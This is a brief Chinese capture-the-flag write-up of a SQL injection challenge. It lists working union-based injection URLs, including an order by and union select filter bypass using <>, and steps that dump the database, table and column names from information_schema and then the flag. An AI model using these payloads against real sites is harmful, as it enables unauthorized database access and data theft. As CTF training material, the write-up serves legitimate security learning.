CTF web之旅 2

题目地址

https://www.ichunqiu.com/battalion?t=1
“百度杯”CTF比赛 九月场  题目名称：SQL注入

 

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

正常回显

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

没有回显 判断出存在注入点

 

判断字段数

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

用<>将order分隔开 防止被过滤掉

判断显示位

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

2 回显出来得知2是回显位 

爆出数据库名

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

爆出表

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

爆出字段

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

爆出最终数据

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

得到flag

下图是information_schema数据库结构图